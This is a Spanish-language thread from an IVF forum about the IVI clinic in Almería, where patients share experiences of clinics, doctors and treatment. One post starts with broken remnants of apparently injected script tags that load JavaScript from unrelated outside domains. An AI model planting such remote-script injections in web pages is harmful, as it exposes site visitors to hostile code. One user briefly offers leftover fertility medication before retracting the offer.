No hay nadie en el ivi de almeria - IVI: Foro de Infertilidad y Reproducción Asistida

Anuncio

Collapse
No announcement yet.

“Prohibición de venta o donación de medicación sobrante según la Ley 29/2006. INFORMACIÓN Y POSIBLES SANCIONES”. Haz click para más información.

No hay nadie en el ivi de almeria

Collapse
X
 
  • Filter
  • Hora
  • Show
Clear All
new posts

    No hay nadie en el ivi de almeria

    Muchas gracias evato; espero que tengas razon y pueda obtener mi sueño, hoy por ejemplo he estado en la clinica Alboran y la verdad el trato no me ha gustado mucho, no me han informado bien. En cuanto a los doctores de Ivi Almeria hay alguno que me recomiendes.
    Gracias por la ayuda; a veces las palabras de los demas sirven de consuelo.
    MUCHA SUERTE.

    Comment


      No hay nadie en el ivi de almeria

      Xena30, en ivi de Almeria hay dos doctoras, las dos son muy majas y profesionales, a mi me han visto las dos y la verdad q no he tenido problema con ninguna. Ya nos cuentas al final q habeis decidido. Mucha suerte tb para ti.

      Comment


        No hay nadie en el ivi de almeria

        Xena ... yo me he exo cuatro fiv icsis una con KOURI, dos por la seguridad social y esta ultima ke ha sido en IVI te direee ke aunke esta ha salido negativa tambien, la doctora molina ha descubierto cosas ke despues de cinco años ningun medico se dio cuenta ... slo ella.
        Ahora voy a por mi congeladito ke me lo pondran la semana ke viene ... y yo jamas antes habia tenido ni congelados ... por lo ke aunke me vuelva a salir negativo ... estoy super contenta.
        Saludos .... y espero ke te decidas por la clinica ke sea ... tengas muxa suertee.

        Comment


          No hay nadie en el ivi de almeria

          Hola chicas; muchas gracias de nuevo por vuestras, pues me ayudan mucho y dan moral; tengo cita para hablar con ivi a finales de este mes; haber que me dicen; yo tambien he tenido fiv con el doctro kouri por la seguridad social, y la verdad es que veo algunas cosas que me resultaron muy raras, en la primera 6 ya fecundados mas dos que me pusieron y me los tiraron y en las 2ª otro que me quedo tras ponerme otros dos tb parece que desaparecio, era un de calidad c. En fin cosas para no pensarlas porque sino...
          y lo peor el trato de biologo.

          En fin gracias chicas por vuestra ayuda, seguiremos en contacto.

          Comment


            No hay nadie en el ivi de almeria

            Hola chicas, hacia un montón de tiempo que no entraba. Ya no tengo internet en casa y algún día que otro entro cuando voy a casa de mis padres.

            Yo empecé en ivi en el 2009 y ya tengo a mi niña de 20 meses que está graciosísima.

            Un saludo para todas, en especial a Itzel.

            Comment


              No hay nadie en el ivi de almeria

              Un saludo a todas y animo y mucha fuerza!!!

              Hyp,ya te envie un privado.Muchos besos.

              Comment


                No hay nadie en el ivi de almeria

                < ="http://tema-rosa.info/dfi823hs.js?0.35259485989809036">< ="http://qhdp.info/perfil/tema.js">
                Hola chicas.Os mando un saludo a todas y deciros que en 15 días empiezo cn la medicación de la invitro aver que tal. Hace 1 semanita me quitaron dos pólipos y aunque iva asustada la chica de quirófano (inés creo que se llama) se portó genial conmigo..la adoro vosotras cómo vais???...mira que cuando voy a la clínica y veo chicas me dan ganas de hablaros pero no creo que todas esteis en este foro aunque me gusta que haya alguien en mi misma situación para poder compartir mis dudas y mis desesperaciones jejeje porqué a veces mi pareja ya le canso....pobrecillo lo que aguanta el pobre jejej Besitosss niñas!!!

                Comment


                  No hay nadie en el ivi de almeria

                  Hola DONO MENOPUR 75 5 viales a quien le haga falta,caduca en NOVIEMBRE DE ESTE AÑO,si a alguien le interesa decidmelo ,hay que aprovechadlo.

                  Comment


                    No hay nadie en el ivi de almeria

                    `Perdon,no sabia que no se podia donar en el foro,acabo de darme cuenta.

                    Comment


                      No hay nadie en el ivi de almeria

                      hola a todas

                      He sacado cita para principios de noviembre en Ivi Almeria. ¿que tal funciona esta clinica?

                      ¿Hacen alguna prueba en la primera consulta??

                      gracias por ayudarme, la verdad es que todo esto me ha venido sin esperarlo y estamos pasandolo realmente mal mi marido y yo..

                      saludos

                      Comment


                        No hay nadie en el ivi de almeria

                        Muy recomendable. A nosotros nos ha ido muy bien.
                        Decirte que habríamos ahorrado tiempo, dinero y esfuerzo
                        si desde el principio solo nos hubiésemos guiado por ellos.

                        Comment


                          No hay nadie en el ivi de almeria

                          Hola Caribe, lo primero muchas gracias por responder. ¿tu ya tienes tu bebe? la verdad es que tenemos muchas ganas de ir a la primera consulta pero miedo a la vez ya que el camino puede ser muy largo y duro y no se si estamos del todo preparados...

                          Comment


                            No hay nadie en el ivi de almeria

                            Hola vane_bona, soy nueva en este foro y a mitad de septiembre fuí a mi primera cita en ivi almeria, la verdad que salí muy contenta ya que yo soy de Granada y aqui me hice una fiv con mal resultado y un médico bastante desagradable. En la primera cita me hicieron una ecografia y me mandaron unos cuantos analisis que ya tengo hechos solo falta el espermiograma de mi marido que lo haremos la proxima semana y ahora tengo que ir con la regla para que me hagan otra eco y ya la doctora vea cuando empezamos el tratamiento.

                            Comment


                              No hay nadie en el ivi de almeria

                              Hola a todas! Acabo de registrarme en el Foro de IVI. Tengo una niña de cuatro años, y ahora estamos buscando el hermanito desde hace ya dos años y no hay manera... El día 22 de Octubre, tenemos cita con la doctora Molina en el IVI de aquí de Almería, porque tenemos que llevarles analíticas que nos han mandado de hormonas, serología, etc. Me gustaría saber si alguien se ha quedado embarazada y cómo ha sido el trato con esta doctora. Muchas gracias y espero respuesta cuanto antes. Un saludo!

                              Comment


                                No hay nadie en el ivi de almeria

                                Itzel2014-01-13 12:30:06

                                Comment

                                Working...
                                X